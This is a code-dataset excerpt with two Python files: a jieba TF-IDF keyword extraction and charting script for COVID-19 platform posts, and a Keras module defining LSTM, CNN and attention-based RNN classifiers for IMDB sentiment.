max_forks_repo_path: POA/scripts/tfidf.py | max_forks_repo_name: ashyseer/COVID-19ServiceWebsite | head: 2eacb445a947c3004542ac3f87a5a88b12ab292d | licenses: ["Apache-2.0"] | forks: 1 (2020-07-18T08:25:12.000Z)
# coding=utf-8
import os
import time
import pandas as pd
import numpy as np
import jieba
import jieba.analyse
import matplotlib.pyplot as plt
from PIL import Image
from datetime import datetime
from matplotlib.font_manager import FontProperties
from openpyxl.workbook import Workbook
from pyecharts import options as opts
from pyecharts.charts import Bar
##################################### Epidemic prevention platform ####################################
#------------------------------------ Chinese word segmentation ------------------------------------
cut_words = ""
data = pd.read_csv('中国社会组织_疫情防控1_1-2_20.csv')
for line in data['正文内容']:
line = str(line)
seg_list = jieba.cut(line,cut_all=False)
cut_words += (" ".join(seg_list))
# jieba.load_userdict("userdict.txt") # custom user dictionary
# jieba.analyse.set_stop_words('stop_words.txt') # stop-word dictionary
# Extract topic keywords; the returned weight is effectively the TF-IDF value
keywords = jieba.analyse.extract_tags(cut_words,
topK=50,
withWeight=True,
allowPOS=('a','e','n','nr','ns', 'v')) # POS filter: adjectives, interjections, nouns, verbs
# Returned as a list
print(keywords)
# Save the data
pd.DataFrame(keywords, columns=['词语','重要性']).to_excel('TF_IDF关键词前50.xlsx')
# keywords itself holds two columns of data
ss = pd.DataFrame(keywords,columns = ['词语','重要性'])
print(ss)
#------------------------------------ matplotlib visualization ------------------------------------
# plt.figure(figsize=(10,6))
# plt.title('TF-IDF Ranking')
# fig = plt.axes()
# plt.barh(range(len(ss.重要性[:25][::-1])),ss.重要性[:25][::-1])
# fig.set_yticks(np.arange(len(ss.重要性[:25][::-1])))
# font = FontProperties(fname=r'c:\windows\fonts\simsun.ttc')
# fig.set_yticklabels(ss.词语[:25][::-1],fontproperties=font)
# fig.set_xlabel('Importance')
# plt.savefig('TF-IDF Ranking.png')
# plt.show()
# #print('over')
#------------------------------------ pyecharts visualization ------------------------------------
data_x = np.array(ss.词语) # convert the dataframe column to an array first
data_x_list = data_x.tolist() # then convert it to a list
#print(data_x_list)
data_y = np.array(ss.重要性) # convert the dataframe column to an array first
data_y_list = data_y.tolist() # then convert it to a list
c = Bar()
# x axis
c.add_xaxis(data_x_list)
# y axis
c.add_yaxis('TF-IDF值',data_y_list)
# the reversal_axis method swaps the x and y axes
# c.reversal_axis()
# False hides the y-axis values (shown by default)
c.set_series_opts(label_opts=opts.LabelOpts(is_show=False),
# markpoint_opts specifies the marker point types
# markpoint_opts=opts.MarkPointOpts(
# data = [
# opts.MarkPointItem(type_="max", name="最大值"),
# opts.MarkPointItem(type_="min", name="最小值"),
# ]
# )
)
c.set_global_opts(title_opts=opts.TitleOpts(title="疫情防控平台数据_TF-IDF _Ranking"),xaxis_opts=opts.AxisOpts(name='词语')
# datazoom_opts shows horizontally by default; orient="vertical" displays it vertically
# datazoom_opts=opts.DataZoomOpts(orient="vertical")
)
c.render('疫情防控平台数据_TF-IDF _Ranking.html')
##################################### Weibo ####################################
# #------------------------------------ Chinese word segmentation ------------------------------------
# cut_words = ""
# data = pd.read_csv('weibo_data.csv')
#
# for line in data['微博中文内容']:
# line = str(line)
# seg_list = jieba.cut(line,cut_all=False)
# cut_words += (" ".join(seg_list))
#
#
# # jieba.load_userdict("userdict.txt") # custom user dictionary
# # jieba.analyse.set_stop_words('stop_words.txt') # stop-word dictionary
#
# # Extract topic keywords; the returned weight is effectively the TF-IDF value
# keywords = jieba.analyse.extract_tags(cut_words,
# topK=50,
# withWeight=True,
# allowPOS=('a','e','n','nr','ns', 'v')) # POS filter: adjectives, interjections, nouns, verbs
#
# # Returned as a list
# print(keywords)
#
# # Save the data
# pd.DataFrame(keywords, columns=['词语','重要性']).to_excel('TF_IDF关键词前50.xlsx')
#
# # keywords itself holds two columns of data
# ss = pd.DataFrame(keywords,columns = ['词语','重要性'])
# #print(ss)
#
# #------------------------------------ visualization ------------------------------------
# # plt.figure(figsize=(10,6))
# # plt.title('TF-IDF Ranking')
# # fig = plt.axes()
# # plt.barh(range(len(ss.重要性[:25][::-1])),ss.重要性[:25][::-1])
# # fig.set_yticks(np.arange(len(ss.重要性[:25][::-1])))
# # font = FontProperties(fname=r'c:\windows\fonts\simsun.ttc')
# # fig.set_yticklabels(ss.词语[:25][::-1],fontproperties=font)
# # fig.set_xlabel('Importance')
# # plt.savefig('TF-IDF Ranking.png')
# # plt.show()
# # #print('over')
# #------------------------------------ visualization ------------------------------------
# data_x = np.array(ss.词语) # convert the dataframe column to an array first
# data_x_list = data_x.tolist() # then convert it to a list
# #print(data_x_list)
# data_y = np.array(ss.重要性) # convert the dataframe column to an array first
# data_y_list = data_y.tolist() # then convert it to a list
#
# c = Bar()
# # x axis
# c.add_xaxis(data_x_list)
# # y axis
# c.add_yaxis('TF-IDF值',data_y_list)
#
# # the reversal_axis method swaps the x and y axes
# # c.reversal_axis()
# # False hides the y-axis values (shown by default)
# c.set_series_opts(label_opts=opts.LabelOpts(is_show=False),
# # markpoint_opts specifies the marker point types
# # markpoint_opts=opts.MarkPointOpts(
# # data = [
# # opts.MarkPointItem(type_="max", name="最大值"),
# # opts.MarkPointItem(type_="min", name="最小值"),
# # ]
# # )
# )
# c.set_global_opts(title_opts=opts.TitleOpts(title="微博数据_TF-IDF _Ranking"),xaxis_opts=opts.AxisOpts(name='词语')
# # datazoom_opts shows horizontally by default; orient="vertical" displays it vertically
# # datazoom_opts=opts.DataZoomOpts(orient="vertical")
# )
# #c.render_notebook()
# c.render('微博数据_TF-IDF _Ranking.html')
#
#
#
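# Hedged sketch (not part of the original script): enabling the custom
# dictionary and stop-word list that the commented lines above refer to,
# assuming userdict.txt and stop_words.txt exist alongside this script.
#
#   jieba.load_userdict("userdict.txt")
#   jieba.analyse.set_stop_words("stop_words.txt")
#   keywords = jieba.analyse.extract_tags(cut_words, topK=50, withWeight=True)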
[previous record trailing columns: avg_line_length 34.5625 | max_line_length 113 | alphanum_fraction 0.539964 | remaining quality-signal metrics omitted]

[next record metadata]
hexsha: 6f99a272fc597c656b0a28d0413771f92563581d | size: 31,049 | ext: py | lang: Python
max_stars_repo_path: imdb/model.py | max_stars_repo_name: FrankBlood/TextClassification | head: a2ac14fc4142e5aef2725fc0d4347d476e1c126f | licenses: ["Apache-2.0"] | stars: 1 (2017-12-15T02:10:06.000Z)
max_issues_repo_path: imdb/model.py | max_issues_repo_name: FrankBlood/TextClassification | head: a2ac14fc4142e5aef2725fc0d4347d476e1c126f | licenses: ["Apache-2.0"] | issues: null
max_forks_repo_path: imdb/model.py | max_forks_repo_name: FrankBlood/TextClassification | head: a2ac14fc4142e5aef2725fc0d4347d476e1c126f | licenses: ["Apache-2.0"] | forks: null
# -*- coding:utf8 -*-
from __future__ import print_function
import numpy as np
from keras.models import Sequential, Model
from keras.layers import Input, Embedding, Dense, LSTM, GRU, Conv1D, GlobalMaxPooling1D, MaxPooling1D, GlobalAveragePooling1D
from keras.layers import TimeDistributed, RepeatVector, Permute, Lambda, Bidirectional, Dropout
from keras.layers.merge import concatenate, add, dot, multiply
from keras.layers.normalization import BatchNormalization
from keras import backend as K
from keras.layers import Activation
from recurrent import ATTENTION_INNER_GRU
from keras.optimizers import RMSprop, Adam, SGD, Adagrad, Adadelta, Adamax, Nadam
from keras.layers.advanced_activations import PReLU
from config import Config
def pre_attention_inner_rnn(config, embedding_matrix=None):
"""Pre Attention INNER RNN
:param config:
:param embedding_matrix:
:return: The model
"""
print("Build Pre Attention INNER RNN...")
if embedding_matrix is None:
# Zero init...
# embedding_matrix = np.zeros((config.max_features, config.embedding_dims))
# Random init...
# numpy_rng = np.random.RandomState(4321)
# embedding_matrix = numpy_rng.uniform(low=-0.05, high=0.05, size=(config.max_features, config.embedding_dims))
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
input_length=config.maxlen)
else:
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
weights=[embedding_matrix],
input_length=config.maxlen,
trainable=False)
########################################
## Input and Embedding
########################################
sequence_input = Input(shape=(config.maxlen,), dtype='int32')
embedded_sequences = embedding_layer(sequence_input)
########################################
## Pre Attention -- LSTM
########################################
attention = LSTM(300, dropout=0.2, recurrent_dropout=0.2, name='attention_layer', trainable=False)(embedded_sequences)
attention = Dense(300, activation='relu')(attention)
# rnn_model = Model(inputs=sequence_input, outputs=rnn)
#
# rnn_model.load_weights('./models/pre_model.h5')
#
# attention = rnn_model.predict_on_batch(sequence_input)
########################################
## Attention INNER GRU Model
########################################
x = Bidirectional(ATTENTION_INNER_GRU(config.lstm_output_size,
attention=attention,
dropout=config.dropout,
recurrent_dropout=config.dropout))(embedded_sequences)
x = Dense(config.hidden_dims, activation='relu')(x)
x = Dropout(config.dropout)(x)
x = BatchNormalization()(x)
preds = Dense(1, activation='sigmoid')(x)
########################################
## train the model
########################################
model = Model(inputs=sequence_input, outputs=preds)
model.compile(loss='binary_crossentropy',
optimizer='nadam',
metrics=['acc'])
model.load_weights('./models/pre_model.h5', by_name=True)
model.summary()
# plot_model(model, to_file=config.model_name+'.png')
return model
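# Hedged usage sketch (not in the original module): compiling happens inside
# pre_attention_inner_rnn(), so training only needs a Config instance and
# padded sequence arrays; x_train and y_train below are assumed names, not
# taken from the original code.
#
#   config = Config()
#   model = pre_attention_inner_rnn(config)
#   model.fit(x_train, y_train,
#             batch_size=32,
#             epochs=5,
#             validation_split=0.1)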
def rnn_cat_rnn(config, embedding_matrix=None):
"""RNN Cat Embedding GRU Model
:param config:
:param embedding_matrix:
:return: The model
"""
print("Build RNN CAT RNN...")
if embedding_matrix is None:
# # embedding_matrix = np.zeros((config.max_features, config.embedding_dims))
# numpy_rng = np.random.RandomState(4321)
# embedding_matrix = numpy_rng.uniform(low=-0.05, high=0.05, size=(config.max_features, config.embedding_dims))
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
input_length=config.maxlen)
else:
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
weights=[embedding_matrix],
input_length=config.maxlen,
trainable=False)
########################################
## Input and Embedding
########################################
sequence_input = Input(shape=(config.maxlen,), dtype='int32')
embedded_sequences = embedding_layer(sequence_input)
########################################
## ATTENTION: RNN Model -- also GRU
########################################
attention = GRU(config.lstm_output_size,
return_sequences=False,
dropout=config.dropout,
recurrent_dropout=config.dropout)(embedded_sequences)
# attention = Dense(300, activation='relu')(attention)
attention = RepeatVector(config.maxlen)(attention)
# x = concatenate([embedded_sequences, attention])
x = multiply([embedded_sequences, attention])
########################################
## Common RNN Model -- GRU
########################################
x = Bidirectional(GRU(config.lstm_output_size,
dropout=config.dropout,
recurrent_dropout=config.dropout))(x)
x = Dense(config.hidden_dims, activation='relu')(x)
x = Dropout(config.dropout)(x)
x = BatchNormalization()(x)
preds = Dense(1, activation='sigmoid')(x)
########################################
## train the model
########################################
model = Model(inputs=sequence_input, outputs=preds)
model.compile(loss='binary_crossentropy',
optimizer='nadam',
metrics=['acc'])
model.summary()
# plot_model(model, to_file=config.model_name+'.png')
return model
def rnn_inner_rnn(config, embedding_matrix=None):
"""RNN Attentive INNER RNN Model
:param config:
:param embedding_matrix:
:return: The model
"""
print("Build RNN Attentive INNER RNN...")
if embedding_matrix is None:
# # embedding_matrix = np.zeros((config.max_features, config.embedding_dims))
# numpy_rng = np.random.RandomState(4321)
# embedding_matrix = numpy_rng.uniform(low=-0.05, high=0.05, size=(config.max_features, config.embedding_dims))
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
input_length=config.maxlen)
else:
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
weights=[embedding_matrix],
input_length=config.maxlen,
trainable=False)
sequence_input = Input(shape=(config.maxlen,), dtype='int32')
embedded_sequences = embedding_layer(sequence_input)
rnn = GRU(config.lstm_output_size,
dropout=config.dropout,
recurrent_dropout=config.dropout)(embedded_sequences)
x = Bidirectional(ATTENTION_INNER_GRU(config.lstm_output_size,
attention=rnn,
dropout=config.dropout,
recurrent_dropout=config.dropout))(embedded_sequences)
x = Dense(config.hidden_dims, activation='relu')(x)
x = Dropout(config.dropout)(x)
x = BatchNormalization()(x)
preds = Dense(1, activation='sigmoid')(x)
########################################
## train the model
########################################
model = Model(inputs=sequence_input, outputs=preds)
model.compile(loss='binary_crossentropy',
optimizer='nadam',
metrics=['acc'])
model.summary()
# plot_model(model, to_file=config.model_name+'.png')
return model
def cnn_inner_rnn(config, embedding_matrix=None):
"""CNN Attentive INNER RNN Model
:param config:
:param embedding_matrix:
:return: cnn inner rnn model
"""
print("Build CNN Attentive INNER RNN Model...")
if embedding_matrix is None:
# # embedding_matrix = np.zeros((config.max_features, config.embedding_dims))
# numpy_rng = np.random.RandomState(4321)
# embedding_matrix = numpy_rng.uniform(low=-0.05, high=0.05, size=(config.max_features, config.embedding_dims))
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
input_length=config.maxlen)
else:
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
weights=[embedding_matrix],
input_length=config.maxlen,
trainable=False)
cnn_layer = Conv1D(activation="relu", padding="valid", strides=1,
filters=config.nb_filter, kernel_size=config.filter_length)
pooling_layer = GlobalMaxPooling1D()
cnn_dense = Dense(config.hidden_dims, activation='relu')
cnn_dropout1 = Dropout(config.dropout)
cnn_dropout2 = Dropout(config.dropout)
cnn_batchnormalization = BatchNormalization()
sequence_input = Input(shape=(config.maxlen,), dtype='int32')
embedded_sequences = embedding_layer(sequence_input)
cnn = cnn_layer(embedded_sequences)
cnn = pooling_layer(cnn)
cnn = cnn_dropout1(cnn)
cnn = cnn_dense(cnn)
cnn = cnn_dropout2(cnn)
cnn = cnn_batchnormalization(cnn)
x = Bidirectional(ATTENTION_INNER_GRU(config.lstm_output_size,
attention=cnn,
dropout=config.dropout,
recurrent_dropout=config.dropout))(embedded_sequences)
x = Dense(config.hidden_dims, activation='relu')(x)
x = Dropout(config.dropout)(x)
x = BatchNormalization()(x)
preds = Dense(1, activation='sigmoid')(x)
########################################
## train the model
########################################
model = Model(inputs=sequence_input, outputs=preds)
model.compile(loss='binary_crossentropy',
optimizer='nadam',
metrics=['acc'])
model.summary()
# plot_model(model, to_file=config.model_name+'.png')
return model
def cnn_add_rnn(config, embedding_matrix=None):
"""CNN add Attentive RNN Model
:param config:
:param embedding_matrix:
:return: The model
"""
print("Build CNN add Attentive RNN...")
if embedding_matrix is None:
# # embedding_matrix = np.zeros((config.max_features, config.embedding_dims))
# numpy_rng = np.random.RandomState(4321)
# embedding_matrix = numpy_rng.uniform(low=-0.05, high=0.05, size=(config.max_features, config.embedding_dims))
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
input_length=config.maxlen)
else:
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
weights=[embedding_matrix],
input_length=config.maxlen,
trainable=False)
rnn_layer = Bidirectional(LSTM(config.lstm_output_size, dropout=config.dropout, recurrent_dropout=config.dropout, return_sequences=True))
cnn_layer = Conv1D(activation="relu", padding="valid", strides=1, filters=config.nb_filter, kernel_size=config.filter_length)
pooling_layer = GlobalMaxPooling1D()
cnn_dense = Dense(config.hidden_dims, activation='relu')
cnn_dropout1 = Dropout(config.dropout)
cnn_dropout2 = Dropout(config.dropout)
cnn_batchnormalization = BatchNormalization()
cnn_dense1 = Dense(config.hidden_dims, activation='tanh')
cnn_dense2 = Dense(config.hidden_dims*2, activation='tanh')
sequence_input = Input(shape=(config.maxlen,), dtype='int32')
embedded_sequences = embedding_layer(sequence_input)
cnn = cnn_layer(embedded_sequences)
cnn = pooling_layer(cnn)
cnn = cnn_dropout1(cnn)
cnn = cnn_dense(cnn)
cnn = cnn_dropout2(cnn)
cnn = cnn_batchnormalization(cnn)
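# Two-stage attention follows. Stage 1: the CNN summary is projected to the
# embedding width (this relies on hidden_dims == embedding_dims, 300 in the
# default Config), multiplied elementwise with every timestep embedding,
# summed over the feature axis to give one score per position, and squashed
# with a sigmoid; those weights gate the embeddings before the bidirectional
# LSTM. Stage 2 repeats the idea on the LSTM outputs with a softmax, and the
# weighted states are summed into a single vector for classification.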
cnn_t = cnn_dense1(cnn)
a = multiply([cnn_t, embedded_sequences])
a = Permute([2, 1])(a)
a = Lambda(lambda x: K.sum(x, axis=1))(a)
a = Activation('sigmoid')(a)
embedded_sequences = Permute([2, 1])(embedded_sequences)
x = multiply([a, embedded_sequences])
x = Permute([2, 1])(x)
x = rnn_layer(x)
cnn_t2 = cnn_dense2(cnn)
a2 = multiply([cnn_t2, x])
a2 = Permute([2, 1])(a2)
a2 = Lambda(lambda x: K.sum(x, axis=1))(a2)
a2 = Activation('softmax')(a2)
x = Permute([2, 1])(x)
x = multiply([a2, x])
x = Permute([2, 1])(x)
x = Lambda(lambda x: K.sum(x, axis=1))(x)
x = Dense(config.hidden_dims, activation='relu')(x)
x = Dropout(config.dropout)(x)
x = BatchNormalization()(x)
preds = Dense(1, activation='sigmoid')(x)
########################################
## train the model
########################################
model = Model(inputs=sequence_input, outputs=preds)
model.compile(loss='binary_crossentropy',
optimizer='nadam',
metrics=['acc'])
model.summary()
# plot_model(model, to_file=config.model_name+'.png')
return model
def complex_cnn_based_rnn(config, embedding_matrix=None):
"""Complex CNN-based attentive RNN model.
:param config: model/hyperparameter configuration
:param embedding_matrix: optional pre-trained embedding weights
:return: the compiled model
"""
print("Build Complex CNN based Attentive RNN...")
if embedding_matrix is None:
# # embedding_matrix = np.zeros((config.max_features, config.embedding_dims))
# numpy_rng = np.random.RandomState(4321)
# embedding_matrix = numpy_rng.uniform(low=-0.05, high=0.05, size=(config.max_features, config.embedding_dims))
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
input_length=config.maxlen)
else:
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
weights=[embedding_matrix],
input_length=config.maxlen,
trainable=False)
rnn_layer = Bidirectional(GRU(config.lstm_output_size,
dropout=config.dropout,
recurrent_dropout=config.dropout))
# cnn_layer = Conv1D(filters=config.nb_filter,
# kernel_size=config.filter_length, padding = "valid", activation="relu", strides=1)
#
# conv1 = Conv1D(filters=config.nb_filter,
# kernel_size=1, padding="valid", strides=1, activation='relu')
conv2 = Conv1D(filters=config.nb_filter,
kernel_size=2, padding="valid", strides=1, activation='relu')
conv3 = Conv1D(filters=config.nb_filter,
kernel_size=3, padding="valid", strides=1, activation='relu')
conv4 = Conv1D(filters=config.nb_filter,
kernel_size=4, padding="valid", strides=1, activation='relu')
# conv5 = Conv1D(filters=config.nb_filter,
# kernel_size=5, padding='same', activation='relu')
#
# conv6 = Conv1D(filters=config.nb_filter,
# kernel_size=6, padding='same', activation='relu')
#
# pooling_layer = GlobalMaxPooling1D()
cnn_dense = Dense(config.hidden_dims, activation='relu')
# cnn_dropout1 = Dropout(0.2)
# cnn_dropout2 = Dropout(0.2)
# cnn_batchnormalization = BatchNormalization()
# cnn_repeatvector = RepeatVector(config.embedding_dims)
# cnn_dense1 = Dense(300, activation='relu')
sequence_input = Input(shape=(config.maxlen,), dtype='int32')
embedded_sequences = embedding_layer(sequence_input)
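# Three parallel Conv1D branches (kernel sizes 2, 3 and 4) each pass through
# global average pooling, dropout and batch normalisation; their outputs are
# concatenated below into the feature vector that drives the attention.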
# conv1a = conv1(embedded_sequences)
# glob1a = GlobalAveragePooling1D()(conv1a)
# glob1a = Dropout(config.dropout)(glob1a)
# glob1a = BatchNormalization()(glob1a)
conv2a = conv2(embedded_sequences)
glob2a = GlobalAveragePooling1D()(conv2a)
glob2a = Dropout(config.dropout)(glob2a)
glob2a = BatchNormalization()(glob2a)
conv3a = conv3(embedded_sequences)
glob3a = GlobalAveragePooling1D()(conv3a)
glob3a = Dropout(config.dropout)(glob3a)
glob3a = BatchNormalization()(glob3a)
conv4a = conv4(embedded_sequences)
glob4a = GlobalAveragePooling1D()(conv4a)
glob4a = Dropout(config.dropout)(glob4a)
glob4a = BatchNormalization()(glob4a)
# conv5a = conv5(embedded_sequences)
# glob5a = GlobalAveragePooling1D()(conv5a)
# glob5a = Dropout(config.dropout)(glob5a)
# glob5a = BatchNormalization()(glob5a)
#
# conv6a = conv6(embedded_sequences)
# glob6a = GlobalAveragePooling1D()(conv6a)
# glob6a = Dropout(config.dropout)(glob6a)
# glob6a = BatchNormalization()(glob6a)
cnn = concatenate([glob2a, glob3a, glob4a])
# print(np.shape(cnn))
# print(cnn.shape)
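# The concatenated CNN features then drive the same sigmoid-gated attention over
# the word embeddings as in cnn_add_rnn above, before the bidirectional GRU.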
cnn_t = cnn_dense(cnn)
a = multiply([cnn_t, embedded_sequences])
a = Permute([2, 1])(a)
a = Lambda(lambda x: K.sum(x, axis=1))(a)
a = Activation('sigmoid')(a)
embedded_sequences = Permute([2, 1])(embedded_sequences)
x = multiply([a, embedded_sequences])
x = Permute([2, 1])(x)
x = rnn_layer(x)
x = Dense(config.hidden_dims, activation='relu')(x)
x = Dropout(config.dropout)(x)
x = BatchNormalization()(x)
preds = Dense(1, activation='sigmoid')(x)
########################################
## train the model
########################################
model = Model(inputs=sequence_input, outputs=preds)
model.compile(loss='binary_crossentropy',
optimizer='nadam',
metrics=['acc'])
model.summary()
return model
def cnn_based_rnn(config, embedding_matrix=None):
"""CNN based Attentive RNN Model
:param config:
:param embedding_matrix:
:return: The model
"""
print("Build CNN based Attentive RNN...")
if embedding_matrix is None:
# # embedding_matrix = np.zeros((config.max_features, config.embedding_dims))
# numpy_rng = np.random.RandomState(4321)
# embedding_matrix = numpy_rng.uniform(low=-0.05, high=0.05, size=(config.max_features, config.embedding_dims))
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
input_length=config.maxlen)
else:
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
weights=[embedding_matrix],
input_length=config.maxlen,
trainable=False)
########################################
## All Used Layers
########################################
rnn_layer = Bidirectional(GRU(config.lstm_output_size, dropout=config.dropout, recurrent_dropout=config.dropout))
cnn_layer = Conv1D(activation="relu", padding="valid", strides=1, filters=config.nb_filter, kernel_size=config.filter_length)
pooling_layer = GlobalMaxPooling1D()
cnn_dense = Dense(config.hidden_dims, activation='relu')
cnn_dropout1 = Dropout(config.dropout)
cnn_dropout2 = Dropout(config.dropout)
cnn_batchnormalization = BatchNormalization()
cnn_dense1 = Dense(config.hidden_dims)
########################################
## Input and Embedding
########################################
sequence_input = Input(shape=(config.maxlen,), dtype='int32')
embedded_sequences = embedding_layer(sequence_input)
########################################
## Attention Layer: CNN
########################################
cnn = cnn_layer(embedded_sequences)
cnn = pooling_layer(cnn)
cnn = cnn_dropout1(cnn)
cnn = cnn_dense(cnn)
cnn = cnn_dropout2(cnn)
cnn = cnn_batchnormalization(cnn)
########################################
## Attention Action
########################################
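# The pooled CNN vector is projected to the embedding width (this relies on
# hidden_dims == embedding_dims), multiplied elementwise with each timestep's
# embedding, summed over the feature axis to yield one score per position, and
# passed through a sigmoid; the resulting weights gate the embeddings before
# they reach the bidirectional GRU below.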
cnn_t = cnn_dense1(cnn)
a = multiply([cnn_t, embedded_sequences])
a = Permute([2, 1])(a)
a = Lambda(lambda x: K.sum(x, axis=1))(a)
a = Activation('sigmoid')(a)
embedded_sequences = Permute([2, 1])(embedded_sequences)
x = multiply([a, embedded_sequences])
x = Permute([2, 1])(x)
########################################
## Output Layers
########################################
x = rnn_layer(x)
x = Dense(config.hidden_dims, activation='relu')(x)
x = Dropout(config.dropout)(x)
x = BatchNormalization()(x)
preds = Dense(1, activation='sigmoid')(x)
########################################
## train the model
########################################
model = Model(inputs=sequence_input, outputs=preds)
model.compile(loss='binary_crossentropy',
optimizer='nadam',
metrics=['acc'])
model.summary()
return model
def bidirectional_lstm(config, embedding_matrix=None):
""" Bidirectional LSTM model
:param config:
:return: the model
"""
print('Build Bidirectional LSTM model...')
if embedding_matrix is None:
# # embedding_matrix = np.zeros((config.max_features, config.embedding_dims))
# numpy_rng = np.random.RandomState(4321)
# embedding_matrix = numpy_rng.uniform(low=-0.05, high=0.05, size=(config.max_features, config.embedding_dims))
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
input_length=config.maxlen)
else:
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
weights=[embedding_matrix],
input_length=config.maxlen,
trainable=False)
sequence_input = Input(shape=(config.maxlen,), dtype='int32')
embedded_sequences = embedding_layer(sequence_input)
x = Bidirectional(LSTM(config.lstm_output_size))(embedded_sequences)
x = Dropout(config.dropout)(x)
preds = Dense(1, activation='sigmoid')(x)
model = Model(inputs=sequence_input, outputs=preds)
# model = Sequential()
# model.add(Embedding(config.max_features, config.embedding_dims, input_length=config.maxlen))
# model.add(Bidirectional(LSTM(config.lstm_output_size)))
# model.add(Dropout(config.dropout))
# model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy',
optimizer='nadam',
metrics=['acc'])
model.summary()
return model
def cnn_lstm(config, embedding_matrix=None):
"""CNN LSTM model
:param config:
:return: the model
"""
print("Build CNN LSTM model...")
if embedding_matrix is None:
# # embedding_matrix = np.zeros((config.max_features, config.embedding_dims))
# numpy_rng = np.random.RandomState(4321)
# embedding_matrix = numpy_rng.uniform(low=-0.05, high=0.05, size=(config.max_features, config.embedding_dims))
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
input_length=config.maxlen)
else:
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
weights=[embedding_matrix],
input_length=config.maxlen,
trainable=False)
sequence_input = Input(shape=(config.maxlen,), dtype='int32')
embedded_sequences = embedding_layer(sequence_input)
x = Dropout(config.dropout)(embedded_sequences)
x = Conv1D(filters=config.nb_filter,
kernel_size=config.filter_length,
padding='valid',
activation='relu',
strides=1)(x)
x = MaxPooling1D(pool_size=config.pool_length)(x)
x = LSTM(config.lstm_output_size)(x)
preds = Dense(1, activation='sigmoid')(x)
model = Model(inputs=sequence_input, outputs=preds)
# model = Sequential()
# model.add(Embedding(config.max_features, config.embedding_dims, input_length=config.maxlen))
# model.add(Dropout(config.dropout))
# model.add(Conv1D(nb_filter=config.nb_filter,
# filter_length=config.filter_length,
# border_mode='valid',
# activation='relu',
# subsample_length=1))
# model.add(MaxPooling1D(pool_length=config.pool_length))
# model.add(LSTM(config.lstm_output_size))
# model.add(Dense(1))
# model.add(Activation('sigmoid'))
model.compile(loss='binary_crossentropy',
optimizer='adam',
metrics=['accuracy'])
model.summary()
return model
def cnn(config, embedding_matrix=None):
"""CNN model
:param config:
:return: the model
"""
print('Build CNN model...')
if embedding_matrix is None:
# # embedding_matrix = np.zeros((config.max_features, config.embedding_dims))
# numpy_rng = np.random.RandomState(4321)
# embedding_matrix = numpy_rng.uniform(low=-0.05, high=0.05, size=(config.max_features, config.embedding_dims))
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
input_length=config.maxlen)
else:
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
weights=[embedding_matrix],
input_length=config.maxlen,
trainable=False)
sequence_input = Input(shape=(config.maxlen,), dtype='int32')
embedded_sequences = embedding_layer(sequence_input)
x = Conv1D(filters=config.nb_filter,
kernel_size=config.filter_length,
padding='valid',
activation='relu',
strides=1)(embedded_sequences)
x = GlobalMaxPooling1D()(x)
x = Dense(config.hidden_dims, activation='relu')(x)
x = Dropout(config.dropout)(x)
preds = Dense(1, activation='sigmoid')(x)
model = Model(inputs=sequence_input, outputs=preds)
# model = Sequential()
#
# # we start off with an efficient embedding layer which maps
# # our vocab indices into embedding_dims dimensions
# model.add(Embedding(config.max_features,
# config.embedding_dims,
# input_length=config.maxlen,
# dropout=config.dropout))
#
# # we add a Convolution1D, which will learn nb_filter
# # word group filters of size filter_length:
# model.add(Conv1D(nb_filter=config.nb_filter,
# filter_length=config.filter_length,
# border_mode='valid',
# activation='relu',
# subsample_length=1))
# # we use max pooling:
# model.add(GlobalMaxPooling1D())
#
# # We add a vanilla hidden layer:
# model.add(Dense(config.hidden_dims))
# model.add(Dropout(config.dropout))
# model.add(Activation('relu'))
#
# # We project onto a single unit output layer, and squash it with a sigmoid:
# model.add(Dense(1))
# model.add(Activation('sigmoid'))
model.compile(loss='binary_crossentropy',
optimizer='nadam',
metrics=['accuracy'])
model.summary()
return model
def lstm(config, embedding_matrix=None):
"""LSTM model
:param config:
:return: the model
"""
print('Build LSTM model...')
if embedding_matrix is None:
# # embedding_matrix = np.zeros((config.max_features, config.embedding_dims))
# numpy_rng = np.random.RandomState(4321)
# embedding_matrix = numpy_rng.uniform(low=-0.05, high=0.05, size=(config.max_features, config.embedding_dims))
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
input_length=config.maxlen)
else:
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
weights=[embedding_matrix],
input_length=config.maxlen,
trainable=False)
sequence_input = Input(shape=(config.maxlen,), dtype='int32')
embedded_sequences = embedding_layer(sequence_input)
x = LSTM(config.lstm_output_size, dropout=config.dropout, recurrent_dropout=config.dropout)(embedded_sequences)
preds = Dense(1, activation='sigmoid')(x)
model = Model(inputs=sequence_input, outputs=preds)
# model = Sequential()
# model.add(Embedding(config.max_features, config.embedding_dims))
# model.add(LSTM(config.lstm_output_size, dropout=config.dropout, recurrent_dropout=config.dropout)) # try using a GRU instead, for fun
# model.add(Dense(1))
# model.add(Activation('sigmoid'))
print('Successfully built...')
# try using different optimizers and different optimizer configs
model.compile(loss='binary_crossentropy',
optimizer='adam',
metrics=['accuracy'])
model.summary()
return model
if __name__ == '__main__':
config = Config(max_feature=102153, maxlen=2570,
batch_size=50, embedding_dims=300, nb_filter=128,
filter_length=3, hidden_dims=300, nb_epoch=20, dropout=0.5,
pool_length=4, lstm_output_size=300, model_name='model',
embedding_file=None)
# model = bidirectional_lstm(config)
# model = cnn(config)
# model = cnn_lstm(config)
# model = lstm(config)
# model = cnn_based_rnn(config)
# model = cnn_add_rnn(config)
# model = complex_cnn_based_rnn(config)
# model = cnn_inner_rnn(config)
# model = rnn_inner_rnn(config)
